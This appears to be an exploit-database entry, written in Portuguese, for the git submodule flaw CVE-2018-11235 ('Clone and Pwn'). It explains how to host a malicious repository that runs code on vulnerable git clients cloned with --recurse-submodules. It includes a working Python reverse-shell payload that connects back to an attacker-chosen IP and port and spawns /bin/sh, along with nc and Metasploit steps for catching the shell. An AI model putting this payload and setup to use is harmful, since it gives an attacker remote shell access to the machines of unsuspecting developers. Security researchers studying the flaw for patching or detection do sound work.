
Exploits CVE-2018-11235
Título do Exploit: Clone and Pwn
Data: 4 de junho de 2018
Autor do Exploit: Alejandro Caceres
Página do fornecedor: https://git-scm.com/
Link do software: https://git-scm.com/downloads
Versão: código arbitrário é executado nas versões do cliente git anteriores a Git 2.13.7, 2.14.x anteriores a 2.14.4, 2.15.x anteriores a 2.15.2, 2.16.x anteriores a 2.16.4 e 2.17.x anteriores a 2.17.1
Testado em: Linux: Ubuntu, Mint, MacOSX
CVE : CVE-2018-11235
CVE-2018-11235, apelidado de clone and pwn aqui, cria um repositório git malicioso que explora um bug no git. Quando o repositório é clonado usando a flag --recurse-submodules, código arbitrário é executado nas versões do cliente git anteriores a Git 2.13.7, 2.14.x anteriores a 2.14.4, 2.15.x anteriores a 2.15.2, 2.16.x anteriores a 2.16.4 e 2.17.x anteriores a 2.17.1.
Para usar este módulo, basta colocá-lo em um servidor com acesso direto à internet (ex.: AWS, Digital Ocean) e abrir o evil.sh. Ele se parecerá
algo como o seguinte:
#!/usr/bin/python
EXTERN_IP="127.0.0.1"
EXTERN_PORT=8080
#reverse shell to IP EXTERN_IP and port EXTERN_PORT
import socket, subprocess, os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((EXTERN_IP, EXTERN_PORT))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
Defina EXTERN_IP e EXTERN_PORT para o IP (externo) e a porta onde deseja receber sua reverse shell. Uma reverse shell pode ser recebida com algo como:
nc -l <EXTERN_IP> EXTERN_PORT ex.: nc -l 193.23.23.32 8080
Ou com o módulo de shell genérico do Metasploit. Quando o usuário executar o comando git clone --recurse-submodules git://<seu ip>/repo dest_dir você receberá uma reverse shell.
Se você estiver com problemas ao executar várias vezes (ou após uma tentativa falha), verifique o seguinte:
ps aux | grep git para garantir que você não esteja executando gitdaemon. Mate quaisquer processos gitdaemon.Código derivado do git patch de @peff (procure pelo
arquivo de teste t/t7415-submodule-names.sh).
Sendo assim, este repositório é publicado sob a GNU General Public License versão 2.
Correção adicional para versões antigas do git cortesia de @atorralba (detalhes neste post).
Este script adaptado de https://github.com/Rogdham/CVE-2018-11235, muito amor e crédito
=======
Explora CVE-2018-11235
Por @_hyp3ri0n e @mehaase